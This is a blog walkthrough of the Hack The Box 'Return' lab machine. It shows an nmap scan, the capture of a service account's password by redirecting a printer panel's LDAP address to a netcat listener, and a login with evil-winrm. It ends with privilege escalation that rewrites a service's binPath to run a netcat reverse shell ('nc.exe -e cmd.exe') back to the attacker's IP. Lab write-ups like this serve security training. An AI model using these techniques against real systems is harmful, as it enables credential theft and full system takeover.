IT and security stuff

HTB – Return Writeup

neoh  main  ~/HTB/return  sudo nmap -sSCV -p- -T4 10.10.11.108 -oN nmap.md
Starting Nmap 7.80 ( https://nmap.org ) at 2021-11-14 11:35 EST
Nmap scan report for 10.10.11.108
Host is up (0.025s latency).
Not shown: 65510 closed ports
PORT      STATE SERVICE       VERSION
53/tcp    open  domain?
| fingerprint-strings: 
|   DNSVersionBindReqTCP: 
|     version
|_    bind
80/tcp    open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: HTB Printer Admin Panel
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2021-11-14 17:08:37Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: return.local0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: return.local0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49671/tcp open  msrpc         Microsoft Windows RPC
49674/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49675/tcp open  msrpc         Microsoft Windows RPC
49679/tcp open  msrpc         Microsoft Windows RPC
49682/tcp open  msrpc         Microsoft Windows RPC
49694/tcp open  msrpc         Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=11/14%Time=61913AFD%P=x86_64-pc-linux-gnu%r(DNS
SF:VersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version
SF:\x04bind\0\0\x10\0\x03");
Service Info: Host: PRINTER; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 32m28s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2021-11-14T17:10:58
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 299.94 seconds

Nmap reveals a lot of ports on this machine. My attention is brought to the SMB server. There is not possible NTLM relay since signing is required but I’ll give it a look if there is anything interesting.

neoh  main  ~/HTB/return  smbclient -L \\\\10.10.11.108\\
Enter WORKGROUP\neoh's password: 
Anonymous login successful

	Sharename       Type      Comment
	---------       ----      -------
SMB1 disabled -- no workgroup available

Unfortunately no guest login available. Let’s check the website running on port 80.

It looks like a printer service.
This is nice I can probably get this user’s password if I try to change the server address for mine. Let’s try!

First I’ll start my “server” using netcat.

neoh  main  ~/HTB/return  sudo nc -nlvp 389
[sudo] password for neoh: 
Listening on 0.0.0.0 389
I changed the address for my IP and hit update.

So we get a hit on our listener!

neoh  main  ~/HTB/return  sudo nc -nlvp 389
[sudo] password for neoh: 
Listening on 0.0.0.0 389
Connection received on 10.10.11.108 64874
0*`%return\svc-printer�
                       1edFg43012!!

Ok now, we got a username and a password. If we remember, nmap revealed Win-RM port is open. Since we have credentials we can use evil-winrm to login into the machine.

neoh  main  ~/HTB/return  evil-winrm -i 10.10.11.108 -u svc-printer
Enter Password: 

Evil-WinRM shell v3.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\svc-printer\Documents> whoami
return\svc-printer
*Evil-WinRM* PS C:\Users\svc-printer\Documents>
*Evil-WinRM* PS C:\Users\svc-printer\Documents> net user svc-printer
User name                    svc-printer
Full Name                    SVCPrinter
Comment                      Service Account for Printer
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            5/26/2021 12:15:13 AM
Password expires             Never
Password changeable          5/27/2021 12:15:13 AM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   5/26/2021 12:39:29 AM

Logon hours allowed          All

Local Group Memberships      *Print Operators      *Remote Management Use
                             *Server Operators
Global Group memberships     *Domain Users
The command completed successfully.

Local group enumeration revealed svc-printer is part of the Server Operators group which allow us to manage services on the system. We are allowed to start, stop and edit services and wth that in mind, I can upload netcat.exe and run it as a service to get an Admin reverse shell. Let’s try that.

*Evil-WinRM* PS C:\Users\svc-printer\Documents> upload /home/neoh/HTB/return/nc.exe
Info: Uploading /home/neoh/HTB/return/nc.exe to C:\Users\svc-printer\Documents\nc.exe

                                                             
Data: 51488 bytes of 51488 bytes copied

Info: Upload successful!

*Evil-WinRM* PS C:\Users\svc-printer\Documents>

Then i start a new listener on my machine and change the config of vss service.

neoh  main  ~/HTB/return  nc -nvlp 4444
Listening on 0.0.0.0 4444


*Evil-WinRM* PS C:\Users\svc-printer\Documents> sc.exe config vss binPath="C:\Users\svc-printer\Documents\nc.exe -e cmd.exe 10.10.14.13 4444"
[SC] ChangeServiceConfig SUCCESS
*Evil-WinRM* PS C:\Users\svc-printer\Documents>

Next step is to stop and start the service which should give us a shell.

*Evil-WinRM* PS C:\Users\svc-printer\Documents> sc.exe stop vss
[SC] ControlService FAILED 1062:

The service has not been started.

*Evil-WinRM* PS C:\Users\svc-printer\Documents> sc.exe start vss

neoh  main  ~/HTB/return  nc -nvlp 4444
Listening on 0.0.0.0 4444
Connection received on 10.10.11.108 65500
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

Rooted!

Leave a Reply

Your email address will not be published.

This site uses Akismet to reduce spam. Learn how your comment data is processed.